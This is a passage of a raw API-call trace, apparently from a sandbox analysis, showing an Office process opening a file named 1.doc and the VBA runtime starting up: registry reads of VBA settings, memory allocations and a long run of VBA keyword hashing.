wcscpy_s (in: _Destination=0x1d39d9cfd60, _SizeInWords=0x804, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc" | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.848] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x84) returned 0x1d39d83b740 [0058.848] wcscpy_s (in: _Destination=0x1d39d83b7b0, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0058.848] wcscpy_s (in: _Destination=0x33e4fb48e0, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0058.848] _ltow_s (in: _Value=0, _Buffer=0x33e4fb48ec, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.849] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d83b740) [0058.849] longjmp () [0058.855] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x84) returned 0x1d39d839f10 [0058.855] wcscpy_s (in: _Destination=0x1d39d839f80, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0058.855] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x180) returned 0x1d39843a980 [0058.855] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39d7fad90 [0058.855] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39d7f8810 [0058.855] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d3984c9b20 [0058.855] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x80) returned 0x1d39d83bb30 [0058.855] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d3984c8da0 [0058.855] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d3984c7ba0 [0058.855] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x28) returned 0x1d398218fd0 [0058.855] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39d614a40 [0058.855] GetLocaleInfoA (in: Locale=0x412, LCType=0x1004, lpLCData=0x33e4fb48dc, cchData=6 | out: lpLCData="949") returned 4 [0058.855] atoi (_Str="949") returned 949 [0058.858] GetLocalTime (in: lpSystemTime=0x33e4fb48d0 | out: lpSystemTime=0x33e4fb48d0*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x99)) [0058.858] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83b740 [0058.858] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a8390 [0058.858] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83adb0 [0058.858] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982190c0 [0058.858] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83ae40 [0058.858] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d83ae40, cb=0x280) returned 0x1d39d9805f0 [0058.858] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a8320 [0058.858] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a80e0 [0058.859] strcpy_s (in: _Dst=0x33e4fb46b0, _DstSize=0xc8, _Src="Software\\Microsoft\\VBA\\" | out: _Dst="Software\\Microsoft\\VBA\\") returned 0x0 [0058.859] strcat_s (in: _Destination="Software\\Microsoft\\VBA\\", _SizeInBytes=0xc8, _Source="7.1\\Common" | out: _Destination="Software\\Microsoft\\VBA\\7.1\\Common") returned 0x0 [0058.859] RegCreateKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x7ffce0c046e8, lpdwDisposition=0x0 | out: phkResult=0x7ffce0c046e8*=0x1204, lpdwDisposition=0x0) returned 0x0 [0058.859] RegQueryValueExA (in: hKey=0x1204, lpValueName="RequireDeclaration", lpReserved=0x0, lpType=0x33e4fb4788, lpData=0x33e4fb4780, lpcbData=0x33e4fb4784*=0x4 | out: lpType=0x33e4fb4788*=0x0, lpData=0x33e4fb4780*=0x4, lpcbData=0x33e4fb4784*=0x4) returned 0x2 [0058.859] RegQueryValueExA (in: hKey=0x1204, lpValueName="CompileOnDemand", lpReserved=0x0, lpType=0x33e4fb4788, lpData=0x33e4fb4780, lpcbData=0x33e4fb4784*=0x4 | out: lpType=0x33e4fb4788*=0x0, lpData=0x33e4fb4780*=0x0, lpcbData=0x33e4fb4784*=0x4) returned 0x2 [0058.859] RegQueryValueExA (in: hKey=0x1204, lpValueName="NotifyUserBeforeStateLoss", lpReserved=0x0, lpType=0x33e4fb4788, lpData=0x33e4fb4780, lpcbData=0x33e4fb4784*=0x4 | out: lpType=0x33e4fb4788*=0x0, lpData=0x33e4fb4780*=0x1, lpcbData=0x33e4fb4784*=0x4) returned 0x2 [0058.859] RegQueryValueExA (in: hKey=0x1204, lpValueName="BackGroundCompile", lpReserved=0x0, lpType=0x33e4fb4788, lpData=0x33e4fb4780, lpcbData=0x33e4fb4784*=0x4 | out: lpType=0x33e4fb4788*=0x0, lpData=0x33e4fb4780*=0x0, lpcbData=0x33e4fb4784*=0x4) returned 0x2 [0058.859] RegQueryValueExA (in: hKey=0x1204, lpValueName="BreakOnAllErrors", lpReserved=0x0, lpType=0x33e4fb4788, lpData=0x33e4fb4780, lpcbData=0x33e4fb4784*=0x4 | out: lpType=0x33e4fb4788*=0x0, lpData=0x33e4fb4780*=0xff, lpcbData=0x33e4fb4784*=0x4) returned 0x2 [0058.859] RegQueryValueExA (in: hKey=0x1204, lpValueName="BreakOnServerErrors", lpReserved=0x0, lpType=0x33e4fb4788, lpData=0x33e4fb4780, lpcbData=0x33e4fb4784*=0x4 | out: lpType=0x33e4fb4788*=0x0, lpData=0x33e4fb4780*=0x0, lpcbData=0x33e4fb4784*=0x4) returned 0x2 [0058.859] RegCloseKey (hKey=0x1204) returned 0x0 [0058.859] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xc0) returned 0x1d39d7cfd00 [0058.859] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xc0) returned 0x1d39d7d0520 [0058.859] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x1300) returned 0x1d39d9d2510 [0058.859] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d39bf30000 [0058.860] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x1d3a30a0000 [0058.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0058.869] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x30) returned 0x1d39d4628e0 [0058.869] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d39d370000 [0058.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0058.870] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a30e0000 [0058.870] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a30f0000 [0058.871] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3100000 [0058.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Intrinsics") returned 0x109464 [0058.871] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3110000 [0058.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0058.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="") returned 0x10c0b3 [0058.872] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39d9d4b80 [0058.874] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoMultiByteToWideChar") returned 0x7ffce05707d0 [0058.874] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3120000 [0058.874] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x1d3a3130000 [0058.875] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39d9d4fb0 [0058.875] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9d4fb0) [0058.875] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="0") returned 0x501047 [0058.875] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x30) returned 0x1d39d463020 [0058.875] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3170000 [0058.876] VirtualAlloc (lpAddress=0x1d3a3130000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3130000 [0058.876] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Abs") returned 0x5072bc [0058.876] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Access") returned 0x501d98 [0058.876] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="AddressOf") returned 0x50e252 [0058.876] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Alias") returned 0x50bf6d [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="And") returned 0x507469 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Any") returned 0x50747a [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Append") returned 0x508f83 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Array") returned 0x509183 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="As") returned 0x505c8d [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Assert") returned 0x5096e9 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="B") returned 0x501059 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Base") returned 0x50afa9 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="BF") returned 0x505ca5 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Binary") returned 0x5008a0 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Boolean") returned 0x50978e [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ByRef") returned 0x5074ef [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Byte") returned 0x501a83 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ByVal") returned 0x5089c5 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Call") returned 0x50744b [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Case") returned 0x507547 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CBool") returned 0x504c74 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CByte") returned 0x506d3c [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CCur") returned 0x508050 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CDate") returned 0x508dc3 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CDec") returned 0x50834a [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CDbl") returned 0x5082e4 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CDecl") returned 0x50a0b9 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ChDir") returned 0x50b2fb [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CInt") returned 0x509f65 [0058.877] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Circle") returned 0x503fd1 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Close") returned 0x5005ab [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Compare") returned 0x50af82 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Const") returned 0x50517a [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CSng") returned 0x50d4d2 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CStr") returned 0x50d5bb [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CurDir") returned 0x501bab [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CurDir$") returned 0x50f7cc [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CurDir") returned 0x501bab [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CVar") returned 0x50e307 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CVDate") returned 0x50cfd6 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CVErr") returned 0x508902 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Currency") returned 0x50f106 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Database") returned 0x50eec7 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Date") returned 0x503b0a [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Date$") returned 0x5031c7 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Date") returned 0x503b0a [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Debug") returned 0x50eaee [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Decimal") returned 0x5036dd [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Declare") returned 0x504a38 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefBool") returned 0x5091ad [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefByte") returned 0x50b275 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefCur") returned 0x50cc45 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefDate") returned 0x50d2fc [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefDec") returned 0x50cf3f [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefDbl") returned 0x50ced9 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefInt") returned 0x50eb5a [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefLng") returned 0x50fb58 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefObj") returned 0x50096b [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefSng") returned 0x502088 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefStr") returned 0x502171 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefVar") returned 0x502ebd [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dir") returned 0x5083c9 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dir$") returned 0x506567 [0058.878] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dir") returned 0x5083c9 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Do") returned 0x505cf8 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DoEvents") returned 0x509634 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Double") returned 0x500d99 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Each") returned 0x50fe75 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Else") returned 0x503b56 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ElseIf") returned 0x50f307 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Empty") returned 0x50f4f1 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="End") returned 0x5089cd [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="EndIf") returned 0x5078bd [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Enum") returned 0x50465a [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Eqv") returned 0x508a4e [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Erase") returned 0x5080da [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Error") returned 0x50db3c [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Error$") returned 0x50cf60 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Error") returned 0x50db3c [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Event") returned 0x50ac4b [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Exit") returned 0x507a1f [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Explicit") returned 0x50edcb [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="F") returned 0x50105d [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="False") returned 0x502d01 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Fix") returned 0x508e81 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="For") returned 0x508f59 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Format") returned 0x502337 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Format$") returned 0x50efc7 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Format") returned 0x502337 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="FreeFile") returned 0x50483a [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Friend") returned 0x50bd1c [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Function") returned 0x507810 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Get") returned 0x509342 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Global") returned 0x50f88f [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Go") returned 0x505d67 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="GoSub") returned 0x50b425 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="GoTo") returned 0x50d70b [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="If") returned 0x505da8 [0058.879] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Imp") returned 0x509f18 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Implements") returned 0x50a988 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="In") returned 0x505db0 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Input") returned 0x50022a [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Input$") returned 0x507767 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Input") returned 0x50022a [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InputB") returned 0x507785 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InputB$") returned 0x500c59 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InputB") returned 0x507785 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InStr") returned 0x50120e [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="InStrB") returned 0x50c2fb [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Int") returned 0x509f41 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Integer") returned 0x50b48a [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Is") returned 0x505db5 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LBound") returned 0x501e0b [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Left") returned 0x507be5 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Len") returned 0x50adf9 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LenB") returned 0x507cfb [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Let") returned 0x50adff [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Lib") returned 0x50ae81 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Like") returned 0x5091f3 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Line") returned 0x509262 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LINEINPUT") returned 0x5008f1 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Load") returned 0x50b096 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Local") returned 0x50353f [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Lock") returned 0x50b0e7 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Long") returned 0x50b27a [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Loop") returned 0x50b2a8 [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LSet") returned 0x50c69e [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Me") returned 0x505e3b [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mid") returned 0x50b3dc [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mid$") returned 0x50566d [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mid") returned 0x50b3dc [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="MidB") returned 0x50568b [0058.880] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="MidB$") returned 0x502a70 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="MidB") returned 0x50568b [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mod") returned 0x50b4ba [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Module") returned 0x501ee1 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Name") returned 0x50f2f0 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="New") returned 0x50b8b3 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Next") returned 0x5009bb [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Not") returned 0x50ba23 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Nothing") returned 0x505f21 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Null") returned 0x505d87 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Object") returned 0x502ec1 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="On") returned 0x505e8e [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Open") returned 0x500767 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Option") returned 0x50f982 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Optional") returned 0x50675a [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Or") returned 0x505e92 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Output") returned 0x50f959 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ParamArray") returned 0x505941 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Preserve") returned 0x50a5fc [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Print") returned 0x50f00d [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Private") returned 0x5073c3 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Property") returned 0x50d2f6 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="PSet") returned 0x50dd55 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Public") returned 0x501287 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Put") returned 0x50c5b3 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="RaiseEvent") returned 0x50274a [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Random") returned 0x50f428 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Randomize") returned 0x50ab02 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Read") returned 0x501d0f [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ReDim") returned 0x50eea8 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Rem") returned 0x50ce0e [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Resume") returned 0x50728b [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Return") returned 0x5038eb [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="RGB") returned 0x50ce4d [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="RSet") returned 0x506891 [0058.881] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Scale") returned 0x50e596 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Seek") returned 0x50e387 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Select") returned 0x50cabd [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Set") returned 0x50d36e [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Sgn") returned 0x50d3b2 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Shared") returned 0x50479e [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Single") returned 0x50a99f [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Spc") returned 0x50d4f4 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Static") returned 0x5029c6 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Step") returned 0x503384 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Stop") returned 0x5034f6 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="StrComp") returned 0x50274d [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="String") returned 0x50102a [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="String$") returned 0x50c31c [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="String") returned 0x50102a [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Sub") returned 0x50d5ac [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Tab") returned 0x50d821 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Text") returned 0x50abed [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Then") returned 0x50b933 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="To") returned 0x505f48 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="True") returned 0x50f0f4 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Type") returned 0x500007 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="TypeOf") returned 0x501832 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="UBound") returned 0x50ea71 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Unload") returned 0x504e44 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Unlock") returned 0x504e95 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Unknown") returned 0x50a11d [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Until") returned 0x50ecec [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Variant") returned 0x508738 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Wend") returned 0x5035a7 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="While") returned 0x50a25c [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Width") returned 0x504e68 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="With") returned 0x504bed [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="WithEvents") returned 0x50f2eb [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Write") returned 0x505c2e [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Xor") returned 0x50ef9b [0058.882] 